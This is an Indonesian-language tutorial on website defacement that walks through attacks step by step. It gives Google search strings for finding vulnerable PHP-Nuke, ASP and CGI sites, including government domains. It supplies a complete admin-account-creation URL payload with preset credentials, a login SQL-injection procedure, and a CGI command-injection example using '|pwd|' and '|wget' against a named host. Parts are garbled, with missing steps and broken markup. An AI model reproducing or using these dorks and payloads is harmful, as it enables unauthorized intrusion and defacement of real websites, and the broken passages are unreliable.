cara dan langkah DEFACE
apa itu daface ?
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dilakukan karena terdapar lubang pada sistem security yang ada di dalam sebuah aplikasi.
Defacer webside dapat berubah tampilan sebagiana atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia suda putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama kelamaan server akan crash dan down.
itulah deface.
nah kalo uda ngerti apa itu daface, sekarang giliran cara melakukan deface..
berikut cara langkah untuk deface
defacesitus php nuke
pake mbah www.google.com
ketik kalimat berikut :
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php
Nah...kalo uda ketemu targetnya maka langkah selanjutnya adalah:
1.www.target.com/nuke/index.php
2.www.target.com/nuke/admin.php => (index.php diatas tadi dirubah menjadi admin.php)
3.Masukkan bug ini dibelakang situs tadi :
?op=AddAuthor&Add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper+1&admin=eCcgVUSjTO4gUOVMRUNUIDEvkjox
misal
www.target.com/nuke/admin.php?op=AddAuthor&Add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper+1&admin=eCcgVUSjTO4gUOVMRUNUIDEvkjox
jika tidak bisa berarti situs tersebut suda dipath oleh admin nya. Tapi jika berhasil, maka di url/browsing akan muncul www.target.com/nuke/admin.php?op-mod_author
4.Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yang diatas tadi
password=render07 => liat yang diatas tadi
Nah kita sekarang suda masuk ke "Administration Menu" situs tersebut. Kamu suda bisa utak atik dan menguasai website tersebut.
daface asp dgn sql injection
1.buka browsing/url www.goggle.co.id
2.ketik site:go.id login.asp
misal nya kita dapat target www.situstarget.com/login.asp
3.username dan pass file yang ada disana
5.cari file yang bisa kita ubah/deface
6.buka browsing/url baru lalu ketikkan target tadi misalnya www.situstarget.com
7.kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgl
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|"page="coart_frontpage.html|wget" nya="">
https://bronte.netpresence.com.au/~wolfsecu/arai.html.../home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target="">allinurl*.cgi * page:.*html+site:.us atau http:///google.co.id/searchq?=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10%sa=N
target harus file html diujungnya jika ingin ditambah |pwd|
Itulah deface dan kamu suda jadi defacer dan suda jadi tersangkah serta buronan sebagai defacer ...
